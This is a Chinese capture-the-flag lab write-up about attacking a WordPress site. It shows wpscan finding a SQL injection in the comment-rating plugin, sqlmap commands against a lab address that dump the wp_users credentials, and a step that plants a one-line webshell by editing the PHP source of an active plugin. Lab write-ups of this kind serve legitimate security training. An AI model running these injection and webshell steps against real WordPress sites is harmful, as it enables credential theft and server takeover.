0x00.题目描述:
背景介绍
某公司内部技术知识分享系统使用了某些插件,为了保证该系统的安全,现要求安全工程师“墨者”对该系统进行安全测试。
实训目标
1、了解wordpress插件的相关漏洞;
2、了解并使用Wpscan扫描wordpress存在的漏洞;
3、了解SQLMAP使用的方法;
4、了解MD5解密的网站等;
5、了解wordpress后台Getshell的方法。
解题方向
根据Wpscan扫描的漏洞详情利用SQLMAP获取管理员账户密码,登录后台GETSHELL。
0x01.解题思路:
靶场环境:可以看到使用了WordPress框架。
sqlmap注入:
首先使用wpscan扫描器对该站点进行扫描。
可以看到, 其中的一个插件——comment-rating插件,存在可注入的点。
在网上可以查到具体是怎么注入,注入的文件是ck-processkarma.php下的id,action以及path参数,接下来构造URL,然后使用sqlmap检测注入点,爆库。
爆数据库名payload:python sqlmap.py -u "http://219.153.49.228:47555/wp-content/plugins/comment-rating/ck-processkarm
a.php?id=1&action=add&path=a" --dbs --batch
爆数据库表名payload:python sqlmap.py -u "http://219.153.49.228:47555/wp-content/plugins/comment-rating/ck-processkarm
a.php?id=1&action=add&path=a" -D test --tables --batch
爆列名payload:python sqlmap.py -u "http://219.153.49.228:47555/wp-content/plugins/comment-rating/ck-processkarm
a.php?id=1&action=add&path=a" -D test -T wp_users --batch
爆字段payload:python sqlmap.py -u "http://219.153.49.228:47555/wp-content/plugins/comment-rating/ck-processkarm
a.php?id=1&action=add&path=a" -D test -T wp_users -C 'user_login,user_pass' --dump --batch
字段爆出来之后,便可以利用用户名和密码登录WordPress后台。
看到插件一栏,点击修改comment-rating插件的PHP源文件,需要注意,修改的源文件最好是已启用的,添加一句话木马:,下一步就是菜刀连了。
菜刀连接getshell,我用的是蚁剑,一连就连上了:
0x02.总结:
1.学习到的新东西还是蛮多的,第一次看WordPress插件源码,使用wpscan扫描服务器的fingerprint,可以扫出来的大概有服务器版本号,数据库版本号等一些信息,最主要的还是能够扫描除WordPress站点使用的插件,以及相关能够利用的漏洞。
2.这次利用的插件是comment-rating插件,利用的方法是SQL注入,拿到WordPress管理员账号密码,登录后台,修改插件源码,添加一句话木马,再用菜刀getshell。
3.没有拿到key,蚁剑第二次连就不行了,看网上说是因为缓存的问题,可是清了缓存也不能再次连上,所以拿不到key~